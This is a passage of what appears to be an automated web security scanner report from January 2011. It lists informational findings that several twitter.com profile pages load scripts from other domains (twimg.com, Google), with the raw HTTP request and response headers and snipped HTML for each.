18.362. http://twitter.com/RobertDuffy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/RobertDuffy

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /RobertDuffy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225077-67311-52082
ETag: "e57068ea600d03f7a7bf890e4a74a917"
Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT
X-Runtime: 0.01335
Content-Type: text/html; charset=utf-8
Content-Length: 50645
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.363. http://twitter.com/RobertDuffy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/RobertDuffy

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /RobertDuffy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:12:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234761-53120-40106
ETag: "f34f1144d312daeb88ddd5b0f1726c5e"
Last-Modified: Fri, 28 Jan 2011 17:12:41 GMT
X-Runtime: 0.00919
Content-Type: text/html; charset=utf-8
Content-Length: 50511
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.364. http://twitter.com/ScampoLiberty previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ScampoLiberty

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409
http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409
http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409
http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:49:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265766-16900-43971
ETag: "8619adc934bf80f7ed7769cb2e43b4b1"
Last-Modified: Sat, 29 Jan 2011 01:49:26 GMT
X-Runtime: 0.00936
Content-Type: text/html; charset=utf-8
Content-Length: 50190
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409" type="text/javascript"></script>
...[SNIP]...

18.365. http://twitter.com/Script_Junkie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Script_Junkie

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225044-37028-38797
ETag: "942c1294489429968d893d85a4217f57"
Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT
X-Runtime: 0.01350
Content-Type: text/html; charset=utf-8
Content-Length: 47541
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.366. http://twitter.com/Sean_P_Doyle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Sean_P_Doyle

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265970-13440-19408
ETag: "cb86339c5381a14bf8b1d3e2b36126a2"
Last-Modified: Sat, 29 Jan 2011 01:52:50 GMT
X-Runtime: 0.01448
Content-Type: text/html; charset=utf-8
Content-Length: 49550
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.367. http://twitter.com/Servigistics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Servigistics

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /Servigistics HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:04 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234664-66120-7492
ETag: "7f30e0eaceac6c09785aa2f10c88bbb9"
Last-Modified: Fri, 28 Jan 2011 17:11:04 GMT
X-Runtime: 0.00995
Content-Type: text/html; charset=utf-8
Content-Length: 50884
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.368. http://twitter.com/Servigistics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Servigistics

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /Servigistics HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225035-39147-1499
ETag: "7908e6f2089de69430d5a81b1f257ac2"
Last-Modified: Fri, 28 Jan 2011 14:30:35 GMT
X-Runtime: 0.01232
Content-Type: text/html; charset=utf-8
Content-Length: 50563
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.369. http://twitter.com/ShaunieONeal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ShaunieONeal

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265973-84120-54992
ETag: "f0218d983026f5440ea1c0cdd842e2ee"
Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT
X-Runtime: 0.01493
Content-Type: text/html; charset=utf-8
Content-Length: 50321
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
